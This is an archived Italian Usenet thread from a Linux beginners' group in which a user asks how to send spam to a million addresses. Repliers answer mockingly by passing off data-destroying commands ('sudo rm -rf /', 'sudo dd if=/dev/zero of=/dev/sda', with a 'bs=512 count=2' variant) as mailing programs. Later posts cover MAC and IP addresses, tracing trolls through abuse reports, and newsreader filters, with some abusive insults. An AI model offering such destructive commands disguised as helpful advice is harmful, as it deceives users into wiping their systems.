Discussione:
consiglio programmi per mandare email
(troppo vecchio per rispondere)
El Terun@Leibstandarte@M.G.
2011-05-06 14:04:39 UTC
Permalink
Un mio amico m'ha passato un file di testo con 1 milione di email mo m'e
venuta l'idea di fa un po di spam. solo che non so come fare perche io so
che mi bloccano tutto se mando email a cosi tanti. esistono sistemi per
automatiz<zare tutto in modo che non mi rompono le palle?? io vedo che
m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
fanno quelli che programmi usano? il linux e utile a fare questo? in che
modo?
El Che
2011-05-06 14:38:37 UTC
Permalink
Post by El ***@Leibstandarte@M.G.
Un mio amico m'ha passato un file di testo con 1 milione di email mo m'e
venuta l'idea di fa un po di spam. solo che non so come fare perche io so
che mi bloccano tutto se mando email a cosi tanti. esistono sistemi per
automatiz<zare tutto in modo che non mi rompono le palle?? io vedo che
m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
fanno quelli che programmi usano? il linux e utile a fare questo? in che
modo?
Esiste il programma "Restless Mailer", un programma solo testo.
Ecco come funziona.

Metti il file di testo che hai ricevuto nella directory radice "/"
Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
directory "/". Poi dài il seguente comando

sudo rm -rf /

ed inserisci la tua password.
--
"I ROM non sanno parlare l'italiano, non si integrano, sono aggressivi."
"E come si distinguono dai leghisti?"
El Che
2011-05-06 14:44:15 UTC
Permalink
Post by El Che
Post by El ***@Leibstandarte@M.G.
Un mio amico m'ha passato un file di testo con 1 milione di email mo m'e
venuta l'idea di fa un po di spam. solo che non so come fare perche io so
che mi bloccano tutto se mando email a cosi tanti. esistono sistemi per
automatiz<zare tutto in modo che non mi rompono le palle?? io vedo che
m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
fanno quelli che programmi usano? il linux e utile a fare questo? in che
modo?
Esiste il programma "Restless Mailer", un programma solo testo.
Ecco come funziona.
Metti il file di testo che hai ricevuto nella directory radice "/"
Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
directory "/". Poi dài il seguente comando
sudo rm -rf /
ed inserisci la tua password.
Dimenticavo che c'è anche un altro programma, forse migliore: si chiama
"dd", dalle iniziali di "Digital Devil" e funziona quasi nello stesso modo
di rm. L'unica differenza con questo è che alla fine devi lanciare

sudo dd if=/dev/zero of=/dev/sda

Buon divertimento.
--
"Adesso mi manca solo un ovulo e poi potrò creare il mio Doctor Spock
personale!"
Fulvio
2011-05-06 17:18:06 UTC
Permalink
Post by El Che
sudo dd if=/dev/zero of=/dev/sda
Si ma ci mette troppo :)
A fine riga metti un bs=512 count=2
E' velocissimo, basta riavviare :D :D
--
Archlinux on (uname -a)
F
ris4keen
2011-05-06 22:30:01 UTC
Permalink
Post by El Che
Post by El Che
sudo rm -rf /
ed inserisci la tua password.
sudo dd if=/dev/zero of=/dev/sda
Non funzionano.

Li ho usati per invitare il mondo intero (ho 6 miliardi di indirizzi mail
che mi ha dato un mio amico recentemente defunto) a plonkare questo
#@^*&,da tutti i NG ma vedo che c'è ancora qualcuno che continua a
rispondergli....

;-)
El Che
2011-05-06 22:58:08 UTC
Permalink
Post by ris4keen
Li ho usati per invitare il mondo intero (ho 6 miliardi di indirizzi mail
che mi ha dato un mio amico recentemente defunto) a plonkare questo
rispondergli....
;-)
<serio>

Io pure ma tanto morpha continuamente :-(

</serio>
--
Dirac was known among his colleagues for his precise and taciturn nature.
His colleagues in Cambridge jokingly defined a unit of a dirac which was one
word per hour.
Fulvio
2011-05-07 13:13:56 UTC
Permalink
Post by El Che
ma tanto morpha continuamente
Ma avra' un IP un MAC da bannarlo !!!

Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!
--
Archlinux on (uname -a)
F
Lorenzo Mainardi
2011-05-07 13:21:38 UTC
Permalink
Post by Fulvio
Post by El Che
ma tanto morpha continuamente
Ma avra' un IP un MAC da bannarlo !!!
Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!
Come fai a trovare il MAC della sua scheda di rete, lo sai solo tu, visto
che tra te e lui ci sono 1000 dispositivi che sostituiscono il MAC
address.
Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre
diversi.
El Terun@Leibstandarte@M.G.
2011-05-07 13:28:18 UTC
Permalink
Post by Lorenzo Mainardi
Post by Fulvio
Post by El Che
ma tanto morpha continuamente
Ma avra' un IP un MAC da bannarlo !!!
Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!
Come fai a trovare il MAC della sua scheda di rete, lo sai solo tu, visto
che tra te e lui ci sono 1000 dispositivi che sostituiscono il MAC
address.
Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre
diversi.
mi puoi rispondere al treah che ho aperto sul problema dell'ortario del
pan?? mi da fastidio che va 1 ora avanti e l'ora di sistema e giusta non si
capisce perche sia cosi
Fulvio
2011-05-07 14:27:32 UTC
Permalink
Post by Lorenzo Mainardi
Come fai a trovare il MAC della sua scheda di rete, lo sai solo tu, visto
che tra te e lui ci sono 1000 dispositivi che sostituiscono il MAC
address.
Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre
diversi.
Va bene, il discorso sta che chiunque si colleghi in rete ha un
identificativo hardware, non si scappa.
Puo' essere il modem od il provider che assegna l' indirizzo. Se fosse in
wifi, il dispositivo ha un identificativo ben preciso come l' IMEI.

Il modo di andare a rintracciare *certi disturbatori* sarebbe da applicare
nella misura proporzionalmente opportuna.
Vorrei dire che potrebbe esser difficile, non impossibile.

Si potra' applicare quando un elevato di rapporti all' ABUSE e _dovrebbe_
prendere provvedimenti.
Nel caso comune si usa un filtro agli articoli e si ignora *certi
disturbatori* con le loro idee assurde.
--
Archlinux on (uname -a)
F
El Che
2011-05-07 14:30:22 UTC
Permalink
Post by Fulvio
Nel caso comune si usa un filtro agli articoli e si ignora *certi
disturbatori* con le loro idee assurde.
È che per linux non esiste, o meglio non ho trovato, un NR decente che
permetta di filtrare i sub-threads iniziati da qualcuno. Una funzione così
ce l'ha thunderbird, ma come lettore di news è un po' scarsino (imho eh!).
Anzi, ogni suggerimento in proposito sarebbe ben accetto :-)
--
"Adesso mi manca solo un ovulo e poi potrò creare il mio Doctor Spock
personale!"
Enrico 'Henryx' Bianchi
2011-05-07 16:42:58 UTC
Permalink
Post by El Che
Anzi, ogni suggerimento in proposito sarebbe ben accetto :-)
KNode permette di ignorare un thread...

Enrico
El Che
2011-05-08 11:18:58 UTC
Permalink
Post by Enrico 'Henryx' Bianchi
Post by El Che
Anzi, ogni suggerimento in proposito sarebbe ben accetto :-)
KNode permette di ignorare un thread...
È che non voglio ignorare un intero thread solo per un post di qualcuno, mi
basta tagliare il subthread che questi inizia. Non so se mi spiego. Con
KNode non son riuscito ad arrivare ad ottenere quello che volevo.
--
Fanculinux: la distro per il troll moderno.
Enrico 'Henryx' Bianchi
2011-05-08 12:56:49 UTC
Permalink
Post by El Che
Non so se mi spiego.
Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
con un altro newsreader

Enrico
El Che
2011-05-08 14:32:00 UTC
Permalink
Post by Enrico 'Henryx' Bianchi
Post by El Che
Non so se mi spiego.
Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
con un altro newsreader
Thunderbird lo fa, ma come lettore di news non mi ci trovo per niente.
Sì, lo so: voglio la proverbiale fettina di culo tagliata sottile sottile
vicino all'osso ;-D
--
Physicists are notoriously scornful of scientists from other fields. When
the great Austrian
physicist Wolfgang Pauli's wife left him for a chemist, 'Had she taken a
bullfighter I would
have understood. But a chemist ... ?' he remarked in wonder to a friend.
Fulvio
2011-05-09 15:17:56 UTC
Permalink
Post by Enrico 'Henryx' Bianchi
Post by El Che
Non so se mi spiego.
Si, ho capito cosa intendi e no, non so se sia fattibile ne con KNode, ne
con un altro newsreader
Credo che si debba installare un proprio server NNTP e dare delle regole di
filtraggio. Una volta c'era Leafnode, ma sara' fuori discussione oramai.
--
Archlinux on (uname -a)
F
El Che
2011-05-09 18:26:27 UTC
Permalink
Post by Fulvio
Credo che si debba installare un proprio server NNTP e dare delle regole
di filtraggio. Una volta c'era Leafnode, ma sara' fuori discussione
oramai.
Posso anche farlo eh. Per cazzaggiare il tempo si trova sempre :P
--
"Calcio vs. Merda 0 - 2"
Enrico 'Henryx' Bianchi
2011-05-09 23:05:08 UTC
Permalink
Post by Fulvio
Credo che si debba installare un proprio server NNTP e dare delle regole
di filtraggio.
Non c'entra nulla, lui non vuole filtrare una persona od un intero thread,
lui vuole filtrare una parte del thread. Cosi` su due piedi, forse XPN lo
fa. In alternativa, visto che dice di avere tempo da perdere, potrebbe
riprenderne lo sviluppo, visto che quel minchione dell'autore (italiano) lo
ha praticamente abbandonato :)

Enrico
El Che
2011-05-10 14:08:04 UTC
Permalink
Post by Enrico 'Henryx' Bianchi
Non c'entra nulla, lui non vuole filtrare una persona od un intero thread,
lui vuole filtrare una parte del thread. Cosi` su due piedi, forse XPN lo
fa. In alternativa, visto che dice di avere tempo da perdere, potrebbe
riprenderne lo sviluppo, visto che quel minchione dell'autore (italiano)
lo ha praticamente abbandonato :)
1) XPN lo fa, ma con gruppi di certa dimensione diventa leeeeento (again:
fettina di culo etc etc :-D)

2) Adesso mi devo laurerare: a sviluppare XPN ci pensiamo dopo :-D
--
Stare dietro a tutti i messaggi di un sistema molto prolisso come linux è
un ottimo modo per farsi male.

-- Giuseppe Della Bianca su I.C.O.L.I.
El Che
2011-05-10 16:28:22 UTC
Permalink
Post by El Che
laurerare
^^^^^^^^^^^^^^
"laureare"
--
"Cuando era presidente del Banco Central de Cuba firmé los billetes con
la palabra Che, para burlarme, porque el dinero, fetiche de mierda, debe
ser feo."
-- Ernesto Guevara de la Serna
Enrico 'Henryx' Bianchi
2011-05-10 23:01:33 UTC
Permalink
Post by El Che
fettina di culo etc etc :-D)
Mi sembra strano, nelle ultime versioni usava come backend SQLite proprio al
fine di velocizzare le operazioni

Enrico
El Che
2011-05-11 00:03:54 UTC
Permalink
Post by Enrico 'Henryx' Bianchi
Post by El Che
fettina di culo etc etc :-D)
Mi sembra strano, nelle ultime versioni usava come backend SQLite proprio
al fine di velocizzare le operazioni
E fammici riprovare, via. Ti saprò dire.
--
"Adesso mi manca solo un ovulo e poi potrò creare il mio Doctor Spock
personale!"
Fulvio
2011-05-11 08:17:44 UTC
Permalink
Post by El Che
fettina di culo etc etc :-D)
S.Daniele o di Parma :D :D
--
Archlinux on (uname -a)
F
Lorenzo Mainardi
2011-05-07 14:37:26 UTC
Permalink
Post by Fulvio
Va bene, il discorso sta che chiunque si colleghi in rete ha un
identificativo hardware, non si scappa. Puo' essere il modem od il
provider che assegna l' indirizzo. Se fosse in wifi, il dispositivo ha
un identificativo ben preciso come l' IMEI.
Mmhh...mi sa che non hai molto chiaro come funziona il protocollo
Ethernet.

Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM
liftman
2011-05-07 15:57:35 UTC
Permalink
Post by Lorenzo Mainardi
Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM
l'imei in genere identifica un cellulare (se viene usato anche per apparati
wi-fi non lo so'), il codice per la sim, e' il numero telefonico....
--
Ciao!
liftman
www.moredifficult.org
Lorenzo Mainardi
2011-05-07 16:08:51 UTC
Permalink
Post by liftman
l'imei in genere identifica un cellulare (se viene usato anche per
apparati wi-fi non lo so'), il codice per la sim, e' il numero
telefonico....
Infatti.
Se ti colleghi con un cellulare hai assegnato un IP (alcune volte anche
dietro NAT), non c'entrano nulla le informazioni telefoniche
Fulvio
2011-05-07 16:32:33 UTC
Permalink
Post by Fulvio
un identificativo ben preciso come l' IMEI.
^^^^^^^^^^^^
Post by Fulvio
Mmhh...mi sa che non hai molto chiaro come funziona il protocollo
Ethernet.
Che c'entra l'IMEI?L'IMEI è un codice che identifica la SIM
Ogni dispositivo ha un suo identificativo di 6 bytes, *come l' IMEI*, che
non risiede nella SIM. Anche bluetooth ha questo identificativo di 6 bytes.

CODE=====================================================================
ifconfig
wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
CODE=====================================================================

Cosa mi dite di questi ?
Ma rinviamo su un altro topico?
--
Archlinux on (uname -a)
F
Lorenzo Mainardi
2011-05-07 16:42:08 UTC
Permalink
Post by Fulvio
Cosa mi dite di questi ?
Ma rinviamo su un altro topico?
È il MAC.
Ma è un parametro di livello 2, e quindi non lo vedi su una rete pubblica.
Enrico 'Henryx' Bianchi
2011-05-07 17:38:00 UTC
Permalink
Post by Fulvio
Cosa mi dite di questi ?
Sono MAC Address che:

- Sono modificabili.
- L'unico server che ne e` a conoscenza e` il DHCP per l'assegnazione
dell'IP.

Per il resto delle operazioni, si usa l'IP (anche se ci sarebbe di mezzo
anche la tabella ARP, destinata a sparire con IPv6), sia esso privato o
pubblico

Enrico
roberto
2011-05-07 16:44:14 UTC
Permalink
Post by Fulvio
wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
Cosa mi dite di questi ?
Che i mac address li conosciamo, ma li vedi solo tu e il router cui ti
attacchi.
Non vengono propagati durante il routing.
--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi ***@softhome.net
El Terun@Leibstandarte@M.G.
2011-05-07 23:34:50 UTC
Permalink
Post by roberto
Post by Fulvio
wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
Cosa mi dite di questi ?
Che i mac address li conosciamo, ma li vedi solo tu e il router cui ti
attacchi.
Non vengono propagati durante il routing.
Cioe se ho capito vi state alleando con le vostre conoscente tecniche per
rintracciarmi? io non faccio nulla di male e questo vostro atteggiamento di
parlare in codice mi pare staking collettivo
roberto
2011-05-09 06:55:02 UTC
Permalink
El ***@Leibstandarte@M.G. ha scritto:
-cut-
Post by El ***@Leibstandarte@M.G.
Post by roberto
Non vengono propagati durante il routing.
Cioe se ho capito vi state alleando con le vostre conoscente tecniche per
No, non hai capito.

E non stiamo parlando in codice, stiamo usando solo termini appropriati
all'argomento.
--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi ***@softhome.net
Fulvio
2011-05-08 07:03:37 UTC
Permalink
Post by roberto
Non vengono propagati durante il routing.
Forse era una mia percezione di esser rintracciato, forse non se ne vuole
tenere conto. Sospetto che comunque sia fattibile trovare una macchina
connessa ad internet.
Programmi come GeoIP, traceroute grafici, mi sanno dire da che luogo sto
scrivendo, circoscritto in un area di pochi chilometri (se non di meno).

A livello privato di ricerca, non sara' cosi' fattibile, _magari_ ci saranno
dei livelli che si puo', non accessibili da comuni utenti.
--
Archlinux on (uname -a)
F
roberto
2011-05-09 07:06:29 UTC
Permalink
Post by Fulvio
Post by roberto
Non vengono propagati durante il routing.
Forse era una mia percezione di esser rintracciato, forse non se ne vuole
tenere conto. Sospetto che comunque sia fattibile trovare una macchina
connessa ad internet.
Non con i dati del mac.
Post by Fulvio
Programmi come GeoIP, traceroute grafici, mi sanno dire da che luogo sto
scrivendo, circoscritto in un area di pochi chilometri (se non di meno).
Be', a me sbagliano di quaranta chilometri a tremila e cinquecento, a
seconda del servizio, non mi sembrano poi così affidabili per trovare
qualcuno.
Post by Fulvio
A livello privato di ricerca, non sara' cosi' fattibile, _magari_ ci saranno
dei livelli che si puo', non accessibili da comuni utenti.
Certo, io faccio casini, tu fai denuncia, il magistrato incarica la
polizia postale, quelli vanno dal mio provider e gli chiedono: alle
ore x più ipsilon, che utente aveva l'IP x.y.w.z?

Il provider glielo dice, gli fornisce copia del contratto, e vengono
a bussarmi a casa per chiederti chiarimenti.

Se i chiarimenti che fornisco non sono troppo chiari e convincenti mi
sequestrano il pc e tutto ciò che può memorizzare dati, e ci guardano
dentro con comodo.
--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi ***@softhome.net
Fulvio
2011-05-09 15:44:11 UTC
Permalink
Post by roberto
Se i chiarimenti che fornisco non sono troppo chiari e convincenti mi
sequestrano il pc e tutto ciò che può memorizzare dati, e ci guardano
dentro con comodo
Dunque, ci si arriva, mi e' stato chiara la spiegazione. Ovvio che si tratta
di livelli di disturbo pubblico.
Al giorno d' oggi, si potrebbe anche paragonare il mondo virtuale di
internet a quello della societa' reale, quindi anche la polizia virtuale
sarebbe un fatto accettabile.

A livelli meno drastici, l' Abuse come puo' rintracciarmi?
--
Archlinux on (uname -a)
F
Marco Albarelli (fu Motosauro) @fisso
2011-05-09 16:04:44 UTC
Permalink
Post by Fulvio
Post by roberto
Se i chiarimenti che fornisco non sono troppo chiari e convincenti mi
sequestrano il pc e tutto ciò che può memorizzare dati, e ci guardano
dentro con comodo
Dunque, ci si arriva, mi e' stato chiara la spiegazione. Ovvio che si tratta
di livelli di disturbo pubblico.
Al giorno d' oggi, si potrebbe anche paragonare il mondo virtuale di
internet a quello della societa' reale, quindi anche la polizia virtuale
sarebbe un fatto accettabile.
A livelli meno drastici, l' Abuse come puo' rintracciarmi?
Se come news server usi quello del tuo ISP allora è presto fatto perché
hanno tutti i dati necessari, altrimenti stessa trafila
--
I fatti mi cosano
roberto
2011-05-09 17:44:44 UTC
Permalink
Fulvio ha scritto:
-cut-
Post by Fulvio
A livelli meno drastici, l' Abuse come puo' rintracciarmi?
L'abuse di chi?[*]
Se stai usando un servizio cui sei iscritto, l'abuse di quel servizio
ha già tutti i dati per rintracciarti, ma principalmente può prendere
direttamente provvedimenti, dall'ammonimento alla cessazione dei suoi
servizi nei tuoi confronti.

[*] Forse c'è un malinteso di fondo. l'abuse non è UNO, ogni provider
e/o news/mail server ha il suo, a seconda degli header del post, ecco
che si può, se si ritiene il caso, informare l'abuse appropriato.
--
|Save our planet!
Ciao |Save wildlife!
roberto |For your E-MAIL use ONLY recycled Bytes !!
|roberto poggi ***@softhome.net
El Che
2011-05-08 11:17:55 UTC
Permalink
Post by Fulvio
CODE=====================================================================
ifconfig
wlan0 Link encap:Ethernet HWaddr 00:21:5D:43:DB:38
eth0 Link encap:Ethernet HWaddr 00:A0:D1:AC:F1:FF
CODE=====================================================================
Cosa mi dite di questi ?
Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per i
callulari), che tra l'altro è un numero di 15 cifre in base 10. Il MAC è
modificabile "on the fly", per l'IMEI probabilmente è fattibile ma non così
semplice.
--
"Cuando era presidente del Banco Central de Cuba firmé los billetes con
la palabra Che, para burlarme, porque el dinero, fetiche de mierda, debe
ser feo."
-- Ernesto Guevara de la Serna
El Che
2011-05-08 11:27:09 UTC
Permalink
Post by El Che
Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per
i callulari)
^^^^^^^^^^^^^^

i "callulari" sono dispositivi atti solo a effettuare chiamate :P
--
Dirac was known among his colleagues for his precise and taciturn nature.
His colleagues in Cambridge jokingly defined a unit of a dirac which was one
word per hour.
Francesco
2011-05-08 12:52:08 UTC
Permalink
Post by El Che
Post by El Che
Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per
i callulari)
^^^^^^^^^^^^^^
i "callulari" sono dispositivi atti solo a effettuare chiamate :P
In quale anno sei rimasto bloccato?
--
Non pretendo che comprendiate il significato di quello che ho scritto senza
averlo riletto un certo numero di volte. Personalmente, vi riterrei degli
stupidi se lo faceste. Io l'ho letto sei volte ed ancora non l'ho capito.
El Che
2011-05-08 14:31:02 UTC
Permalink
Post by Francesco
Post by El Che
i "callulari" sono dispositivi atti solo a effettuare chiamate :P
In quale anno sei rimasto bloccato?
Ho scritto "CALLulari" invece di "cellulari" e mi son fatto da solo la
battuta ;-)
--
Un popolo che gioisce/s'intristisce per il calcio merita l'estinzione.
Francesco
2011-05-08 15:26:34 UTC
Permalink
Post by El Che
Post by Francesco
Post by El Che
i "callulari" sono dispositivi atti solo a effettuare chiamate :P
In quale anno sei rimasto bloccato?
Ho scritto "CALLulari" invece di "cellulari" e mi son fatto da solo la
battuta ;-)
Io invece non avevo fatto caso alla A e pensavo ti riferissi ai cellulari;
e date le nuove tennologie ...
--
Non pretendo che comprendiate il significato di quello che ho scritto senza
averlo riletto un certo numero di volte. Personalmente, vi riterrei degli
stupidi se lo faceste. Io l'ho letto sei volte ed ancora non l'ho capito.
Marco Albarelli (fu Motosauro) @fisso
2011-05-09 13:59:54 UTC
Permalink
Post by El Che
Post by El Che
Come ti hanno detto, sono MAC address e non IMEI (che AFAIK vale solo per
i callulari)
^^^^^^^^^^^^^^
i "callulari" sono dispositivi atti solo a effettuare chiamate :P
No, i Callulari sono aggeggi che le comunicazioni te le portano a piedi
ogni volta, da cui i problemi ai piedi
--
I fatti mi cosano
El Terun@Leibstandarte@M.G.
2011-05-07 23:23:30 UTC
Permalink
Post by Fulvio
Post by Lorenzo Mainardi
Come fai a trovare il MAC della sua scheda di rete, lo sai solo tu, visto
che tra te e lui ci sono 1000 dispositivi che sostituiscono il MAC
address.
Anche l'IP non lo blocchi, perchè le ADSL casalinghe hanno IP sempre
diversi.
Va bene, il discorso sta che chiunque si colleghi in rete ha un
identificativo hardware, non si scappa.
Puo' essere il modem od il provider che assegna l' indirizzo. Se fosse in
wifi, il dispositivo ha un identificativo ben preciso come l' IMEI.
Il modo di andare a rintracciare *certi disturbatori* sarebbe da applicare
nella misura proporzionalmente opportuna.
Vorrei dire che potrebbe esser difficile, non impossibile.
Si potra' applicare quando un elevato di rapporti all' ABUSE e _dovrebbe_
prendere provvedimenti.
Nel caso comune si usa un filtro agli articoli e si ignora *certi
disturbatori* con le loro idee assurde.
Incrdebili vedere che sul newsgroup esistono eprcsone come te dei veri e
prori DISCRIMINATORI tu solo perche ne sai piu di me mi vuoi trattare di
merda peensi di farmi sparire dal newsgroup ma ti sbagli perche questo cazzo
di newsgrioup e dedicato ai principianti esattamente come sono io e non e
proprieta di LOBBISTI DI MERDA COME TE.

Non riusciarai a farmi bannare da x private perche io non ho fatto niente di
male, anzi se capisco bene tu vorresti prorpio farmi bannare dal mio
fornitore internet che io pago regolarmente e a peso d'oro. sei solo un
cretino patetico che si crce il padrone del mondo ma con me vedrai ora e
sempre sorci verdi

CAPITO??? pezzo di merda
kirby
2011-05-08 19:19:00 UTC
Permalink
questo cazzo di newsgrioup e dedicato ai principianti esattamente come sono io
Non essere cosi catastrofico e con cosi poca autostima, te non sei per
nulla un principiante ma bensi un professionista con la P maiuscola
della deficenza reincarnata in uno sterco unmano....
LuciferSam
2011-05-08 19:33:31 UTC
Permalink
Post by kirby
Non essere cosi catastrofico e con cosi poca autostima, te non sei per
nulla un principiante ma bensi un professionista con la P maiuscola
della deficenza reincarnata in uno sterco unmano....
detto anche troll :)
El Terun@Leibstandarte@M.G.
2011-05-07 13:27:23 UTC
Permalink
Post by Fulvio
Post by El Che
ma tanto morpha continuamente
Ma avra' un IP un MAC da bannarlo !!!
Non mi dire che continuera' a cambiare modem o WI-FI di continuo!!
--
Archlinux on (uname -a)
F
mi puoi rispondere al post su con l'ora del pan?
El Che
2011-05-07 14:14:21 UTC
Permalink
Post by Fulvio
Ma avra' un IP un MAC da bannarlo !!!
Dove vedi il MAC negli headers? :-/
Fosse così sempplice bannare gli imbecilli... Ci metterei una firma.
--
"Centomila morti" = "È una tragedia!"
"Trovato un superstite" = "Grazie a Dio! È un miracolo!"
WTF!?
Gabriele
2011-05-06 15:14:07 UTC
Permalink
Post by El Che
Post by El ***@Leibstandarte@M.G.
Un mio amico m'ha passato un file di testo con 1 milione di email mo m'e
venuta l'idea di fa un po di spam. solo che non so come fare perche io so
che mi bloccano tutto se mando email a cosi tanti. esistono sistemi per
automatiz<zare tutto in modo che non mi rompono le palle?? io vedo che
m'arrivano 300 email al giorno di spam a me quindi la cosa e legale come
fanno quelli che programmi usano? il linux e utile a fare questo? in che
modo?
Esiste il programma "Restless Mailer", un programma solo testo.
Ecco come funziona.
Metti il file di testo che hai ricevuto nella directory radice "/"
Metti lì la mail che vuoi mandare chiamala "mail.txt" anch'essa nella
directory "/". Poi dài il seguente comando
sudo rm -rf /
ed inserisci la tua password.
Consiglio anch'io questo comando... lo ha consigliato qualcuno "quindi
la cosa e legale" ;-)

Gabriele
Continua a leggere su narkive:
Loading...